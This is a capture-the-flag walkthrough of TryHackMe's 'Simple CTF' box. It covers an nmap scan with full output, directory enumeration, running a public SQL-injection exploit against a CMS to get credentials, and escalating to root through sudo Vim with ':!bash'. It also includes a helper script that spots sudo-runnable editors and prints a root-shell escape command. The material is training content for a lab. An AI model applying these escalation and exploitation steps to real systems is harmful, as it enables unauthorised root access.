Well, it all begins with a new CTF. This time it is Simple CTF by MrSeth6797. Kudos to him for creating this challenge!

Follow along with me and join the room: https://tryhackme.com/room/easyctf


Nmap Aggressive Scan!

The first thing I did was run an nmap scan. I went for an aggressive scan so that I get every detail possible about the ports that are up: -A bundles OS detection, version detection, the default NSE scripts and a traceroute (so -sC and -sV are redundant next to it), and -T4 speeds things up at the cost of being noisy, which is fine on a CTF box.

# Nmap 7.70 scan initiated Mon Aug 19 23:44:41 2019 as: nmap -sC -sV -T4 -A -o nmapAgressive 10.10.123.218
Nmap scan report for 10.10.123.218 (10.10.123.218)
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.2.42
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 (86%), Linux 2.6.32 - 3.1 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   203.19 ms 10.8.0.1 (10.8.0.1)
2   202.75 ms 10.10.123.218 (10.10.123.218)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 19 23:45:36 2019 -- 1 IP address (1 host up) scanned in 56.13 seconds

Three ports are open: 21 (FTP), 80 (HTTP) and 2222 (SSH, on a non-standard port, so later connections need -p 2222).
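A report like the one above is easy to skim past, so here is a small helper, added for this writeup and not part of the original post, that pulls the actionable facts out of an nmap normal-output (-oN) file: every open port, the port SSH is really on, whether anonymous FTP was accepted, and the paths nmap read from robots.txt. The report it parses is a constructed sample modelled on the scan above; the file name and temp-file handling are assumptions.

```shell
#!/bin/sh
# Added example (not from the original writeup): summarise an nmap -oN report.
# The report below is a constructed sample modelled on the scan in the writeup.

SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
# Nmap 7.70 scan initiated Mon Aug 19 23:44:41 2019 as: nmap -A -T4 -oN nmapAggressive 10.10.123.218
Nmap scan report for 10.10.123.218
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
EOF

# Every open port as "port/proto open service version", single-spaced.
# Only lines whose first field looks like "NNN/tcp" or "NNN/udp" are port rows.
open_ports() {
    awk '$2 == "open" && $1 ~ /^[0-9]+\/(tcp|udp)$/ { $1 = $1; print }' "$1"
}

# Port number of the SSH service wherever it listens (here 2222, not 22).
ssh_port() {
    open_ports "$1" | awk '$3 == "ssh" { sub(/\/.*/, "", $1); print $1 }'
}

# Succeeds when the ftp-anon NSE script saw anonymous login accepted.
anon_ftp() {
    grep -q 'ftp-anon: Anonymous FTP login allowed' "$1"
}

# Disallowed paths reported by the http-robots.txt script, one per line.
# The paths follow the "N disallowed entries" line on "| " lines, with the
# last one on a "|_" line, several paths per line separated by spaces.
robots_paths() {
    awk '/http-robots\.txt:/ { grab = 1; next }
         grab && /^\|_/ { sub(/^\|_ */, ""); for (i = 1; i <= NF; i++) print $i; grab = 0; next }
         grab && /^\| /  { sub(/^\| */, "");  for (i = 1; i <= NF; i++) print $i }' "$1"
}

# Human-readable summary of the points worth following up.
summary() {
    echo "open ports:"
    open_ports "$1"
    anon_ftp "$1" && echo "anonymous FTP: yes (retry the listing in passive mode if it times out)"
    echo "robots.txt paths:"
    robots_paths "$1"
    echo "ssh port: $(ssh_port "$1")"
}

summary "$SAMPLE"
```

The awk filters key on nmap's column layout (STATE is always the second field of a port row), so the same functions work on any -oN file, not just this one; the robots parser stops at the `|_` line so it does not swallow the next script's output.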

We can see that port 21 is open and allows anonymous FTP login, but nmap could not get a directory listing (TIMEOUT), and logging in by hand shows nothing either. (A listing that hangs after a successful login is usually the data connection being blocked, so it is worth one retry in passive mode before writing it off.)

Either way, this turned out to be a rabbit hole!

Opening the IP in the browser gives the default Apache page.

From here, we need to run dirb/gobuster and/or Nikto to find the available directories and any issues.

Gobuster revealed some directories. The robots.txt file (which the nmap http-robots.txt script had already flagged) points at another one, /openemr-5_0_1_3.

Opening that directory turned out to be a rabbit hole as well.

There is one more directory, named simple. Opening it presents a CMS.

A quick Google search for that CMS turned up multiple CVEs, one of them a SQL injection.

The CVE entry included exploit code, so I simply saved it and ran it against the URL. The usage of the script is as shown above.

Once it finished, it gave me a username and password.

With those credentials in hand, SSH is the next step (it listens on 2222, so connect with ssh -p 2222) for enumerating the box and getting our flags.

Checking the home directory, I came across the user flag.

I enumerated the machine further for places where I could escalate privileges. The usual first check, sudo -l, shows that this user can run Vim as root.

So we run Vim through sudo and escalate by spawning a shell from inside it: at the Vim command line, :!bash (the :! prefix runs a shell command, and since Vim itself is running as root, so is the shell it spawns).
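To make the sudo -l step less of a guess, here is a small triage helper, added here and not part of the original writeup, that reads sudo -l output, lists what the user may run as root, and prints the exact Vim escape to use. The sudo -l text is a constructed sample; the user name, host name and the extra /usr/bin/id entry are assumptions for the sample.

```shell
#!/bin/sh
# Added example (not from the original writeup): triage "sudo -l" output for an
# editor with a shell escape, and print the one-liner that yields a root shell.
# The sudo -l text below is constructed; user1, target and /usr/bin/id are assumed.

SUDO_L='Matching Defaults entries for user1 on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user1 may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim, /usr/bin/id'

# Commands the user may run as root: take the "(root) ..." or "(ALL ...) ..."
# lines, strip the "(runas)" group and any TAG: prefixes such as NOPASSWD:,
# then split the comma-separated command list, one command per line.
root_runnable() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*\((root|ALL)/ {
            sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "")
            sub(/^([A-Z]+:[[:space:]]*)*/, "")
            n = split($0, cmd, /,[[:space:]]*/)
            for (i = 1; i <= n; i++) print cmd[i]
        }'
}

# For an editor with a shell escape, the command that gives a root shell:
# vim's ":!cmd" runs cmd from inside the editor, and under sudo the editor
# (and therefore the child shell) is root. -c runs the ex command on startup.
escalation_for() {
    case "$(basename "$1")" in
        vim|vi|vim.basic)
            printf "sudo %s -c ':!/bin/sh'\n" "$1" ;;
        *)
            return 1 ;;
    esac
}

# Walk the sudo -l list and print every usable escape it contains.
find_escapes() {
    root_runnable "$1" | while read -r bin; do
        escalation_for "$bin" || true
    done
}

find_escapes "$SUDO_L"
```

On the target you would feed it `sudo -l` directly (`find_escapes "$(sudo -l)"`). The defensive caveat: granting an editor through sudo is equivalent to granting a root shell unless the sudoers entry carries the NOEXEC tag, which stops the editor from exec'ing child processes and so blocks the :! escape.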

And we are root!

I hope you are able to find the root flag from here.

Happy Hunting!